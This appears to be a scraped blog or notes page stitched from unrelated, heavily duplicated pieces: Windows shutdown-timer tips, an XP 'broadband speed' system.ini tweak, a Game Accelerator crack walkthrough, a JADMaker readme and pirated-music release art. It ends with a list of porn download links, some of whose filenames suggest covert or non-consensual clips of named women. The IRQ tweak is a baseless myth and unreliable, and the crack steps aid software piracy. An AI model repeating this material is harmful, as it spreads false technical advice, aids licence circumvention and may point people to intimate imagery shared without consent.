How to shutdown PC with a timer ?
Labels: Tips-Tricks
METHOD 1
Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
Step 1:
Right click on your desktop and choose "New=>shortcuts".
Step 2:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Step 3:
Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse.
To abort:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
METHOD 2
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run
Type Code: at 11:35 shutdown -s
to abort
Code:
shutdown -a
take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type
"at 20:30 shutdown -s" without quote
METHOD 3
you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown
shutdown.bat
Type Code:
@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit
also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown Pc"
using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting Pc"
movies b grade...
Sunday, December 26, 2010
hp pavilion
http://en.kioskea.net/forum/affich-30646-change-vista-to-xp-in-pavilion-dv-4
imp site
=====
http://h10025.www1.hp.com/ewfrf/wc/softwareList?lc=en&cc=us&dlc=en&product=500515&lang=en&os=228
=====
http://h20180.www2.hp.com/apps/Lookup?h_pagetype=s-002&h_client=S-A-R163-1&h_page=hpcom&submit.y=7&submit.x=7&lang=en&cc=us&h_lang=en&h_cc=us&h_query=pavilion+1280&x=0&y=0
imp site
=====
http://h10025.www1.hp.com/ewfrf/wc/softwareList?lc=en&cc=us&dlc=en&product=500515&lang=en&os=228
=====
http://h20180.www2.hp.com/apps/Lookup?h_pagetype=s-002&h_client=S-A-R163-1&h_page=hpcom&submit.y=7&submit.x=7&lang=en&cc=us&h_lang=en&h_cc=us&h_query=pavilion+1280&x=0&y=0
speed internet
Improve the broadband performance in Windows XP/2003
Labels: Tips-Tricks
Well, before doing this....do this test.
1) Goto http://www.testmy.net/ and click on Download Speed Test, and then on Smart Test....(and while conducting this test, don't forget to close all Instant Messagers, and there should be no other web activity, other than the test)
2) Note down the speeds.
Now, lets see, what all changes to be made.....
This tip is designed for increased BROADBAND speed in Windows XP while using standard Network Interface cards (NIC) that are connected to ADSL modems, or when using any directly-connected USB ADSL modem.
To speed up the Internet connection speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the NIC or the USB modem.
This tip is only recommended if you have 256MB RAM or higher.
Step #1 - Identify the IRQ used by the NIC/USB modem
1. Open the System Information tool by running MSINFO3
2.EXE from the Run command.2. Expand System Summary > Hardware Resources > IRQs.
3. Look for the listing made for your NIC (in my case - a Intel® PRO/100+ Management Adapter). Note the IRQ next to the specified line (in my case - IRQ21).
In case of USB modems you will first need to find the right USB device used by your modem. Follow these steps:
1. Open the Device Manager tool by running DEVMGMT.MSC from the Run command (or by right-clicking My Computer > Hardware tab > Device Manager button).
2. Scroll down to Universal Serial Bus controllers and expand it.
3. Right-click the USB Root Hub and select Properties. Note that you might need to do so for all listed USB Root hubs (if there are more than one) in order to find the right one.
4. In the Power tab, look for your USB ADSL modem.
5. In the Resources tab look for the assigned IRQ (in this case - IRQ21).
6. This is the IRQ we're looking for.Note: IRQs and modem names might vary...
Step #2 - Modify the system.ini file
1. Run SYSEDIT.EXE from the Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file till you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type IrqX=4096 where X is the designated IRQ number we found in step #1, in my case it's IRQ21.Note: This line IS CASE SENSITIVE!!!
5. Click on the File menu, then choose Save.
6. Close SYSEDIT and reboot your computer.Done.
Speed improvement will be noticed after the computer reboots.
NOW DO THE SPEED TEST AGAIN (MENTIONED IN THE BEGINNING) AND NOTICE THE CHANGE IN SPEEDThe most speed improvement is visible with USB.
Labels: Tips-Tricks
Well, before doing this....do this test.
1) Goto http://www.testmy.net/ and click on Download Speed Test, and then on Smart Test....(and while conducting this test, don't forget to close all Instant Messagers, and there should be no other web activity, other than the test)
2) Note down the speeds.
Now, lets see, what all changes to be made.....
This tip is designed for increased BROADBAND speed in Windows XP while using standard Network Interface cards (NIC) that are connected to ADSL modems, or when using any directly-connected USB ADSL modem.
To speed up the Internet connection speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the NIC or the USB modem.
This tip is only recommended if you have 256MB RAM or higher.
Step #1 - Identify the IRQ used by the NIC/USB modem
1. Open the System Information tool by running MSINFO3
2.EXE from the Run command.2. Expand System Summary > Hardware Resources > IRQs.
3. Look for the listing made for your NIC (in my case - a Intel® PRO/100+ Management Adapter). Note the IRQ next to the specified line (in my case - IRQ21).
In case of USB modems you will first need to find the right USB device used by your modem. Follow these steps:
1. Open the Device Manager tool by running DEVMGMT.MSC from the Run command (or by right-clicking My Computer > Hardware tab > Device Manager button).
2. Scroll down to Universal Serial Bus controllers and expand it.
3. Right-click the USB Root Hub and select Properties. Note that you might need to do so for all listed USB Root hubs (if there are more than one) in order to find the right one.
4. In the Power tab, look for your USB ADSL modem.
5. In the Resources tab look for the assigned IRQ (in this case - IRQ21).
6. This is the IRQ we're looking for.Note: IRQs and modem names might vary...
Step #2 - Modify the system.ini file
1. Run SYSEDIT.EXE from the Run command.
2. Expand the system.ini file window.
3. Scroll down almost to the end of the file till you find a line called [386enh].
4. Press Enter to make one blank line, and in that line type IrqX=4096 where X is the designated IRQ number we found in step #1, in my case it's IRQ21.Note: This line IS CASE SENSITIVE!!!
5. Click on the File menu, then choose Save.
6. Close SYSEDIT and reboot your computer.Done.
Speed improvement will be noticed after the computer reboots.
NOW DO THE SPEED TEST AGAIN (MENTIONED IN THE BEGINNING) AND NOTICE THE CHANGE IN SPEEDThe most speed improvement is visible with USB.
info
www.indirdown.com
www.resimciturk.com
www.filmdeposu.org
by debreli74
--
..._..."..____________________, ,
....../ `---___________----_____|] = = = = = DEBRELÝ74
...../_==o;;;;;;;;_______.:/
.....), ---.(_(__) /
....// (..) ), ----"
...//___//
..//___//
.//___//
www.resimciturk.com
www.filmdeposu.org
by debreli74
--
..._..."..____________________, ,
....../ `---___________----_____|] = = = = = DEBRELÝ74
...../_==o;;;;;;;;_______.:/
.....), ---.(_(__) /
....// (..) ), ----"
...//___//
..//___//
.//___//
instruction
1) Install Game Accelerator 7.4 and close quickly when the program prompted to buy
Also exit from application if running in taskbar
2) Go to application folder Default: C:\Program Files\Game Accelerator\
and delete the files "Gamexl" and "Gres"
3) Update by running "Game accelerator Update 7.6"
Exit the Program Authentication prompt if appears!
4) Place the activator in Game Accererator's directory , and execute it!
Thats it!
Also exit from application if running in taskbar
2) Go to application folder Default: C:\Program Files\Game Accelerator\
and delete the files "Gamexl" and "Gres"
3) Update by running "Game accelerator Update 7.6"
Exit the Program Authentication prompt if appears!
4) Place the activator in Game Accererator's directory , and execute it!
Thats it!
jadmaker
JADMaker for Nokia Java Games
Version 1.15
for Windows 9x/NT/2K/ME/XP
http://www.geocities.com/mangokun/
!!! You MUST put the files below together in the same folder.
JADMaker.exe
JADMaker.txt
config.xml (will be created if not found)
unzip32.dll
What
JADMaker creates a JAD file for your .JAR Java Games, so that you can install them to your mobile phone.
Features:
- simple DRAG and DROP operations!
- allows batch processing of JAR files
- enabling Explorer Context-Menu extension allows you to generate a JAD file quickly
- keep the program 'Always on Top' of all other windows (Useful)
- keep your program settings (in a XML file)
Why
Interest in Java Games for Nokia mobile phones.
Some of the Java Games for Nokia mobile phones does not comes with a .jad file, so I searched the net for a JAD generator.
Came across a lousy program called 'JADgen', so I decided to make one that is better then it.
How to use this program?
There are 3 ways.
1) Run JADMaker. Drag and drop a JAR file onto the window. JAD generated. That's it!
2) Drag and drop a JAR file onto the JADMaker.exe icon in a Windows Explorer window.
This means you can also create a desktop shortcut to JADMaker.exe, and then drop JAR file(s) onto the shortcut.
3) Once the "Make JAD" Explorer Context-Menu extension is enabled (by checking it in the program),
you can right click on any JAR file(s) for a quick "Make JAD".
Remember that you can process multiple JAR files at one time (=batch procesing).
Just select multiple files, and use any of the ways above (this is really the icing on the cake!).
With so many ways to get your JAD file, you are spoilt for choice!!!
Installation
No special installation is required on Windows.
JADMaker can be put in any folder (together with other required files).
You may make a shortcut to it on your Desktop.
Troubleshooting
Basic list of VB runtime files and MS scripting file required in your system
msvbvm60.dll: http://www.microsoft.com/downloads/details.aspx?FamilyID=bf9a24f9-b5c5-48f4-8edd-cdf2d29a79d5&DisplayLang=en
scrrun.dll: http://msdn.microsoft.com/library/default.asp?url=/downloads/list/webdev.asp
mscomctl.ocx: http://www.majorgeeks.com/faqshow.php?id=8
msxml3.dll
* When I try to run JADMaker, it dies with the following error: Component 'MSCOMCTL.OCX' or one of its dependencies not correctly registered: a file is missing or invalid
If you encounter this error, you will need to install the file MSCOMCTL.OCX to your computer.
Download sites:
- http://www.majorgeeks.com/faqshow.php?id=8
- Missing MSCOMCTL.OCX Library File: http://www.ascentive.com/support/new/support_dll.phtml?dllname=MSCOMCTL.OCX
- http://www.geocities.com/nitin_speed/resources.htm#mscomctl
* When I try to run JADMaker, it dies with the following error: The file 'MSVBVM60.DLL' cannot be found...
MSVBVM60.DLL is a support file required to run any Visual Basic 6 program.
If you encounter this error, you will need to install the 'Visual Basic 6.0 Runtime Module'.
Visual Basic 6.0 Runtime Module
http://www.microsoft.com/downloads/details.aspx?FamilyID=bf9a24f9-b5c5-48f4-8edd-cdf2d29a79d5&DisplayLang=en
Download sites:
- Direct Download from Microsoft site: http://download.microsoft.com/download/vb60pro/Redist/sp5/WIN98Me/EN-US/VBRun60sp5.exe
- Missing MSVBVM60.DLL Library File: http://www.ascentive.com/support/new/support_dll.phtml?dllname=MSVBVM60.DLL
* When I try to run JADMaker, it dies with the following error(s):
Run-time error '429' ActiveX component can't create object
Run-time error '-2147221231 (80040111)': Automation error ClassFactory cannot supply requested class
The error that you have encountered is caused by some VB runtime and MS scripting files not being properly installed or uninstalled from the system.
One way that the run-time error 429 occurs is when one of the components that is needed by the program is not registered correctly.
The File System object is contained in the Scrrun.dll file. Make certain that this DLL file is installed on the target computer, and that it is correctly registered.
http://support.microsoft.com/kb/247979/EN-US/
* When I try to run JADMaker, it dies with the following error:
Run time error '430': Class does not support Automation or does not support expected interface
This error message does not mean that there is something wrong with MDAC. It means that some DLL file, which is referenced from the application, is missing.
However it is recommended that you get your system updated to MDAC 2.5 SP3 or higher.
- MDAC Downloads: http://msdn.microsoft.com/data/mdac/default.aspx
- PQ Systems - MDAC Information: http://www.pqsystems.com/kb/question.php?qstId=521
* When I try to run JADMaker, it dies with the following error:
Run-time error '53': File not found
or MANIFEST.MF not found in ...
My program checks for a file "MANIFEST.MF" in your .JAR file.
Pls check manually that you have a valid .JAR file.
Version History
1.15 (Jan 13, 2005)
- Minor code changes to better handle error that arises with invalid .JAR files
1.1 (Sep 12, 2003)
- Removed a serious bug in the program, that will cause extra lines in the JAD file
Disclaimer
This program is free. You may distribute it, but you may not charge money for it.
Send suggestions and comments to:
mangokun@hotmail.com
Programmed by Goh Mingkun using Visual Basic 6.0
Last update on Thurs, Jan 13, 2005
Version 1.15
for Windows 9x/NT/2K/ME/XP
http://www.geocities.com/mangokun/
!!! You MUST put the files below together in the same folder.
JADMaker.exe
JADMaker.txt
config.xml (will be created if not found)
unzip32.dll
What
JADMaker creates a JAD file for your .JAR Java Games, so that you can install them to your mobile phone.
Features:
- simple DRAG and DROP operations!
- allows batch processing of JAR files
- enabling Explorer Context-Menu extension allows you to generate a JAD file quickly
- keep the program 'Always on Top' of all other windows (Useful)
- keep your program settings (in a XML file)
Why
Interest in Java Games for Nokia mobile phones.
Some of the Java Games for Nokia mobile phones does not comes with a .jad file, so I searched the net for a JAD generator.
Came across a lousy program called 'JADgen', so I decided to make one that is better then it.
How to use this program?
There are 3 ways.
1) Run JADMaker. Drag and drop a JAR file onto the window. JAD generated. That's it!
2) Drag and drop a JAR file onto the JADMaker.exe icon in a Windows Explorer window.
This means you can also create a desktop shortcut to JADMaker.exe, and then drop JAR file(s) onto the shortcut.
3) Once the "Make JAD" Explorer Context-Menu extension is enabled (by checking it in the program),
you can right click on any JAR file(s) for a quick "Make JAD".
Remember that you can process multiple JAR files at one time (=batch procesing).
Just select multiple files, and use any of the ways above (this is really the icing on the cake!).
With so many ways to get your JAD file, you are spoilt for choice!!!
Installation
No special installation is required on Windows.
JADMaker can be put in any folder (together with other required files).
You may make a shortcut to it on your Desktop.
Troubleshooting
Basic list of VB runtime files and MS scripting file required in your system
msvbvm60.dll: http://www.microsoft.com/downloads/details.aspx?FamilyID=bf9a24f9-b5c5-48f4-8edd-cdf2d29a79d5&DisplayLang=en
scrrun.dll: http://msdn.microsoft.com/library/default.asp?url=/downloads/list/webdev.asp
mscomctl.ocx: http://www.majorgeeks.com/faqshow.php?id=8
msxml3.dll
* When I try to run JADMaker, it dies with the following error: Component 'MSCOMCTL.OCX' or one of its dependencies not correctly registered: a file is missing or invalid
If you encounter this error, you will need to install the file MSCOMCTL.OCX to your computer.
Download sites:
- http://www.majorgeeks.com/faqshow.php?id=8
- Missing MSCOMCTL.OCX Library File: http://www.ascentive.com/support/new/support_dll.phtml?dllname=MSCOMCTL.OCX
- http://www.geocities.com/nitin_speed/resources.htm#mscomctl
* When I try to run JADMaker, it dies with the following error: The file 'MSVBVM60.DLL' cannot be found...
MSVBVM60.DLL is a support file required to run any Visual Basic 6 program.
If you encounter this error, you will need to install the 'Visual Basic 6.0 Runtime Module'.
Visual Basic 6.0 Runtime Module
http://www.microsoft.com/downloads/details.aspx?FamilyID=bf9a24f9-b5c5-48f4-8edd-cdf2d29a79d5&DisplayLang=en
Download sites:
- Direct Download from Microsoft site: http://download.microsoft.com/download/vb60pro/Redist/sp5/WIN98Me/EN-US/VBRun60sp5.exe
- Missing MSVBVM60.DLL Library File: http://www.ascentive.com/support/new/support_dll.phtml?dllname=MSVBVM60.DLL
* When I try to run JADMaker, it dies with the following error(s):
Run-time error '429' ActiveX component can't create object
Run-time error '-2147221231 (80040111)': Automation error ClassFactory cannot supply requested class
The error that you have encountered is caused by some VB runtime and MS scripting files not being properly installed or uninstalled from the system.
One way that the run-time error 429 occurs is when one of the components that is needed by the program is not registered correctly.
The File System object is contained in the Scrrun.dll file. Make certain that this DLL file is installed on the target computer, and that it is correctly registered.
http://support.microsoft.com/kb/247979/EN-US/
* When I try to run JADMaker, it dies with the following error:
Run time error '430': Class does not support Automation or does not support expected interface
This error message does not mean that there is something wrong with MDAC. It means that some DLL file, which is referenced from the application, is missing.
However it is recommended that you get your system updated to MDAC 2.5 SP3 or higher.
- MDAC Downloads: http://msdn.microsoft.com/data/mdac/default.aspx
- PQ Systems - MDAC Information: http://www.pqsystems.com/kb/question.php?qstId=521
* When I try to run JADMaker, it dies with the following error:
Run-time error '53': File not found
or MANIFEST.MF not found in ...
My program checks for a file "MANIFEST.MF" in your .JAR file.
Pls check manually that you have a valid .JAR file.
Version History
1.15 (Jan 13, 2005)
- Minor code changes to better handle error that arises with invalid .JAR files
1.1 (Sep 12, 2003)
- Removed a serious bug in the program, that will cause extra lines in the JAD file
Disclaimer
This program is free. You may distribute it, but you may not charge money for it.
Send suggestions and comments to:
mangokun@hotmail.com
Programmed by Goh Mingkun using Visual Basic 6.0
Last update on Thurs, Jan 13, 2005
$$$$$$$$$$$$$+---------------------------------------------+$$$$$$##$$$$$$
$$$$$$$$$$$$$|==#####==######=#####==#====#===##===#====#==|$$$$$$###$$$$$
$$$$$####$$$$|==#====#=#======#====#=##==##==#==#==##===#==|$$$$$$$$##$$$$
$$$###$$$$$$$|==#====#=#####==#====#=#=##=#=#====#=#=#==#==|$$#$$$$##$$$$$
$$$#$$$$$$$$$|==#####==#======#====#=#====#=######=#==#=#==|$$$$$$#$$$$$#$
$$$#$$$$$$$#$|==#===#==#======#====#=#====#=#====#=#===##==|$$$$$##$$$$$$$
$$$#$$$$$$$$$|==#====#=######=#####==#====#=#====#=#====#==|$$$$$#$$$$$$$$
$$$###$$$$$$$|=============================================|$$$$$#$$$$$$$$
$$$$$###$$$$$|=======#####===#####====#====#####====#======|$$$$$#$$$$#$$$
$$$#$$$##$$$$|======#=====#=#=====#==##===#=====#==##======|$$$$##$$$$$$$$
$$$$$$$$#$$$$|============#=======#=#=#===#=====#=#=#======|$$$$###$$$$$$$
$$#$$$##$$$$$|=======#####===#####====#====######===#======|$$$$$$###$$$$$
$$$$$##$$$$$$|============#=#=========#=========#===#======|$$$$$$$$##$$$$
$$$$##$$$$$$$|======#=====#=#=========#===#=====#===#======|$$$$$$$$$#$$$$
$$$$#$$$$#$$$|=======#####==#######=#####==#####==#####====|$$#$$$$$$#$$$$
$$$$#$$$$$$$$|=============================================|$$$$$$$$#$$$$$
$$$$#$$$$$$$$+---------------------------------------------+$$$$$$$##$$$$$
$$$$$#$$$$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$##$$$$$$
$$$$$##$$$$$$$$$$+------------------------------------+$$$$$$$$$$##$$$$$$$
$$$$$$##$$$$$$$$$| ------------ |$$#$$$$$$##$$$$$$$$
$$#$$$$#$$$$$$$$$| //// \\\\ |$$#$$$$$##$$$$$$$$$
$$$$$$$##$$$$$$$$| || Kottonmouth kings || |$$$$$$##$$$$$$$$$$$
$$$$$$$$##$$$$$$$| | Royal Highness | |$$$$$$#$$$$$$$$$$$$
$$$$$$$$$#$$$$#$$| | 1998 | |$$$$##$$$$$$$$$$#$$
$$$$$$$$##$$$$$$$| || || |$$$$#$$$$$$$$$$$$$$
$#$$$$$$#$$$$$$$$| \\\\ //// |$$$#$$$$$$$$$$$$$$$
$$$$$$$#$$$$$$$$$| ------------ |$$$#$$$$$$$$$$$$$$$
$$$$$##$$$$$$$$$$| |$$$#$$$$$$$$$$$$$$$
$$$$##$$$$$$$$$$$| Bitrate [320 |$$$##$$$$$$$$$$$$$$
$$$##$$$$$$$$$$$$| Artist [kottonmouth Kings |$$$$##$$$$$$$$$$$$$
$$##$$$$$$$$$$$$$| Album [Royal Highness |$$$$$##$$$$$$$$$$$$
$$#$$$$$$#$$$$$$$| Year [1998 |$$$$$$#$$$$$$#$$$$$
$$#$$$$$$$$$$$$$$| Genre [Hip-Hop/Rap/Rock |$$$$$$$##$$$$$$$$$$
$$##$$$$$$$$$$$$$| |$$$#$$$$$#$$$$$$$$$
$$$#$$$$$$$$$#$$$| |$$$$$$$$$##$$$$$$$$
$$$##$$$$$$$$$$$$| |$$$$$$$$$$#$$$$$$$$
$$$$##$$$$$$$$$$$| TRACKS: |$$$$$$$$$$##$$$$$$$
$$$$$###$$$$$$$$$| |$$$$$$$$$$$#$$$$$$$
$$$$$$$#####$$$$$| 1. Bong Tokin' Alcoholics |$$$$$$$$$$$#$$$$$$$
$$$$$$$$$$$##$$$$| 2. Play On |$$$$$$$$$$##$$$$$$$
$$$$$$$$$$$$##$$$| 3. Suburban Life |$$$$$$$$$##$$$$$$$$
$$$$$$$$$$$$$#$$$| 4. Life Ain't What It Seems |$$$$$$###$$$$$$$$$$
$$$$$$$$$$$$$#$$$| 5. So High |$$$$$##$$$$$$$$$$$$
$$$$$$$$#$$$#$$$$| 6. Big Hoss |$$$$##$$$$$$$$$$##$
$$$$$$$$$$$##$$$$| 7. Spies |$$$#$$$$$$$$$$$$$$$
$$$$$$$$$$$#$$$$$| 8. Bump |$$$#$$$$$$$$$$$$$$$
$$$$$$$$$$##$$$$$| 9. Dog's Life |$$$#$$$$$$$#$$$$$$$
$$$$$$$$$##$$$$$$| 10. Misunderstood |$$$##$$$$$$$$$$$$$$
$$$$$$$###$$$$$$$| 11. Dirt Slang |$$$$####$$$$$$$$$$$
$$$$$$$#$$$$$$$$$| 12. What's Your Trip |$$$$$$$###$$$$$$$$$
$$$#$$$#$$$$$$$$$| 13. High Society |$$$$$$$$$###$$$$$$$
$$$$$$$#$$$$$$$$$| 14. Psychedelic Funk |$$$$$$$$$$$##$$$$$$
$$$$$$##$$$$$$$$$| 15. Me & My Skate |$$#$$$$$$$$$##$$$$$
$$$$$$#$$$$$$$$$$| 16. Discombobulated |$$$$$$$$$$$$$#$$$$$
$$$$$$##$$$$$$#$$+------------------------------------+$$$$$$$$$$$$$#$$$$$
$$$$$$$##$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$
$$$$$$$$###$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$#$$
$$$$$$$$$$##$$$$$$$$$$$############$$$$$$$$$$$$$$$$$##############$$#$$$$$
$$$$$$$$$$$####$$$$$####$$$$$$$$$$$#$$$$$$$$$$$$$$###$$$$$$$$$$$$####$$$$$
$$$$$$$#$$$$$$#######$$$$$$$$$$$$$$$####$$$$$$$###$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$########$$$$$$$$$$$#$$$$$$$$$$$$$$$
$$$$$$$$$redman32191$[h33t]$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$|==#####==######=#####==#====#===##===#====#==|$$$$$$###$$$$$
$$$$$####$$$$|==#====#=#======#====#=##==##==#==#==##===#==|$$$$$$$$##$$$$
$$$###$$$$$$$|==#====#=#####==#====#=#=##=#=#====#=#=#==#==|$$#$$$$##$$$$$
$$$#$$$$$$$$$|==#####==#======#====#=#====#=######=#==#=#==|$$$$$$#$$$$$#$
$$$#$$$$$$$#$|==#===#==#======#====#=#====#=#====#=#===##==|$$$$$##$$$$$$$
$$$#$$$$$$$$$|==#====#=######=#####==#====#=#====#=#====#==|$$$$$#$$$$$$$$
$$$###$$$$$$$|=============================================|$$$$$#$$$$$$$$
$$$$$###$$$$$|=======#####===#####====#====#####====#======|$$$$$#$$$$#$$$
$$$#$$$##$$$$|======#=====#=#=====#==##===#=====#==##======|$$$$##$$$$$$$$
$$$$$$$$#$$$$|============#=======#=#=#===#=====#=#=#======|$$$$###$$$$$$$
$$#$$$##$$$$$|=======#####===#####====#====######===#======|$$$$$$###$$$$$
$$$$$##$$$$$$|============#=#=========#=========#===#======|$$$$$$$$##$$$$
$$$$##$$$$$$$|======#=====#=#=========#===#=====#===#======|$$$$$$$$$#$$$$
$$$$#$$$$#$$$|=======#####==#######=#####==#####==#####====|$$#$$$$$$#$$$$
$$$$#$$$$$$$$|=============================================|$$$$$$$$#$$$$$
$$$$#$$$$$$$$+---------------------------------------------+$$$$$$$##$$$$$
$$$$$#$$$$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$##$$$$$$
$$$$$##$$$$$$$$$$+------------------------------------+$$$$$$$$$$##$$$$$$$
$$$$$$##$$$$$$$$$| ------------ |$$#$$$$$$##$$$$$$$$
$$#$$$$#$$$$$$$$$| //// \\\\ |$$#$$$$$##$$$$$$$$$
$$$$$$$##$$$$$$$$| || Kottonmouth kings || |$$$$$$##$$$$$$$$$$$
$$$$$$$$##$$$$$$$| | Royal Highness | |$$$$$$#$$$$$$$$$$$$
$$$$$$$$$#$$$$#$$| | 1998 | |$$$$##$$$$$$$$$$#$$
$$$$$$$$##$$$$$$$| || || |$$$$#$$$$$$$$$$$$$$
$#$$$$$$#$$$$$$$$| \\\\ //// |$$$#$$$$$$$$$$$$$$$
$$$$$$$#$$$$$$$$$| ------------ |$$$#$$$$$$$$$$$$$$$
$$$$$##$$$$$$$$$$| |$$$#$$$$$$$$$$$$$$$
$$$$##$$$$$$$$$$$| Bitrate [320 |$$$##$$$$$$$$$$$$$$
$$$##$$$$$$$$$$$$| Artist [kottonmouth Kings |$$$$##$$$$$$$$$$$$$
$$##$$$$$$$$$$$$$| Album [Royal Highness |$$$$$##$$$$$$$$$$$$
$$#$$$$$$#$$$$$$$| Year [1998 |$$$$$$#$$$$$$#$$$$$
$$#$$$$$$$$$$$$$$| Genre [Hip-Hop/Rap/Rock |$$$$$$$##$$$$$$$$$$
$$##$$$$$$$$$$$$$| |$$$#$$$$$#$$$$$$$$$
$$$#$$$$$$$$$#$$$| |$$$$$$$$$##$$$$$$$$
$$$##$$$$$$$$$$$$| |$$$$$$$$$$#$$$$$$$$
$$$$##$$$$$$$$$$$| TRACKS: |$$$$$$$$$$##$$$$$$$
$$$$$###$$$$$$$$$| |$$$$$$$$$$$#$$$$$$$
$$$$$$$#####$$$$$| 1. Bong Tokin' Alcoholics |$$$$$$$$$$$#$$$$$$$
$$$$$$$$$$$##$$$$| 2. Play On |$$$$$$$$$$##$$$$$$$
$$$$$$$$$$$$##$$$| 3. Suburban Life |$$$$$$$$$##$$$$$$$$
$$$$$$$$$$$$$#$$$| 4. Life Ain't What It Seems |$$$$$$###$$$$$$$$$$
$$$$$$$$$$$$$#$$$| 5. So High |$$$$$##$$$$$$$$$$$$
$$$$$$$$#$$$#$$$$| 6. Big Hoss |$$$$##$$$$$$$$$$##$
$$$$$$$$$$$##$$$$| 7. Spies |$$$#$$$$$$$$$$$$$$$
$$$$$$$$$$$#$$$$$| 8. Bump |$$$#$$$$$$$$$$$$$$$
$$$$$$$$$$##$$$$$| 9. Dog's Life |$$$#$$$$$$$#$$$$$$$
$$$$$$$$$##$$$$$$| 10. Misunderstood |$$$##$$$$$$$$$$$$$$
$$$$$$$###$$$$$$$| 11. Dirt Slang |$$$$####$$$$$$$$$$$
$$$$$$$#$$$$$$$$$| 12. What's Your Trip |$$$$$$$###$$$$$$$$$
$$$#$$$#$$$$$$$$$| 13. High Society |$$$$$$$$$###$$$$$$$
$$$$$$$#$$$$$$$$$| 14. Psychedelic Funk |$$$$$$$$$$$##$$$$$$
$$$$$$##$$$$$$$$$| 15. Me & My Skate |$$#$$$$$$$$$##$$$$$
$$$$$$#$$$$$$$$$$| 16. Discombobulated |$$$$$$$$$$$$$#$$$$$
$$$$$$##$$$$$$#$$+------------------------------------+$$$$$$$$$$$$$#$$$$$
$$$$$$$##$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$
$$$$$$$$###$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$#$$
$$$$$$$$$$##$$$$$$$$$$$############$$$$$$$$$$$$$$$$$##############$$#$$$$$
$$$$$$$$$$$####$$$$$####$$$$$$$$$$$#$$$$$$$$$$$$$$###$$$$$$$$$$$$####$$$$$
$$$$$$$#$$$$$$#######$$$$$$$$$$$$$$$####$$$$$$$###$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$########$$$$$$$$$$$#$$$$$$$$$$$$$$$
$$$$$$$$$redman32191$[h33t]$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
limewire
-Fly Girls (2010) (Janie Summers,Jenna Haze,Jesse Jane,Katsuni,Raven Alexis,Riley Steele,Alanah Rae,Diamond Foxxx,Jayden Cole,Lisa Ann,Nikki Benz,Sasha Grey)
T-728035328-Who's Nailin' Paylin Dvdrip-Full Movie - (Lisa Ann, Holly West, Nina Hartley, Jada Fire) (Release 11-08-08)
T-499141748-Porno - Lisa Ann & Ava Lauren Reality Kings
T-728035328-Who's Nailin' Paylin Dvdrip-Full Movie - (Lisa Ann, Holly West, Nina Hartley, Jada Fire) (Release 11-08-08)
T-499141748-Porno - Lisa Ann & Ava Lauren Reality Kings
http://www.megaporn.com/?d=PP1BXTBE
http://www.megaporn.com/?d=NYPT6WOP
http://www.megaporn.com/?d=P451BCNT
http://www.megaporn.com/?d=XTAR28C8
http://www.megaporn.com/?d=XTAR28C8
http://www.megaporn.com/?d=V9D03RTM
http://www.megaporn.com/?d=MYX3H1GB
http://www.megaporn.com/?d=4XP1FXCA
http://www.megaporn.com/?d=KY8VTVDU
http://www.megaporn.com/?d=M0NWYACD
http://www.megaporn.com/?d=M0NWYACD
http://www.megaporn.com/?d=TO1SURXU
http://www.megaporn.com/?d=EYRZF2J8
http://www.megaporn.com/?d=YWHOU1AD
http://www.megashare.com/1518513
http://www.megashare.com/1408911
http://rapidshare.com/files/269928772/hotservantsex.wmv
http://www.megaporn.com/?d=83PGHMX0
http://www.megaporn.com/?d=PTRAE4VD
http://www.easy-share.com/1905878182/busty%20mallu%20aunty.wmv
http://www.easy-share.com/1905878131/mallu%20preetha.wmv
http://www.megashare.com/1026400
http://www.easy-share.com/1905448672/Sreeja_chittoor.3gp
http://www.easy-share.com/1905339309/Mallu%20Babilona.mpg
http://www.easy-share.com/1905339309/Mallu%20Babilona.mpg
http://www.easy-share.com/1905251213/Copy%20of%20srilankan%20babe.wmv
http://www.megashare.com/920248
http://www.megaporn.com/?d=IKNPLM4G
http://www.megashare.com/889382
http://www.megashare.com/836144
http://www.megashare.com/834962
http://www.megashare.com/749191
http://www.megashare.com/742629
http://www.megashare.com/728409
http://www.megashare.com/696330
http://www.megashare.com/598461
http://www.megashare.com/593633
http://rapidshare.com/files/197808672/navel.wmv
http://rapidshare.com/files/194929964/desi_boobed_girl.wmv
http://rapidshare.com/files/193612379/kannure.3gp
http://www.megarotic.com/?d=KKOT05GH
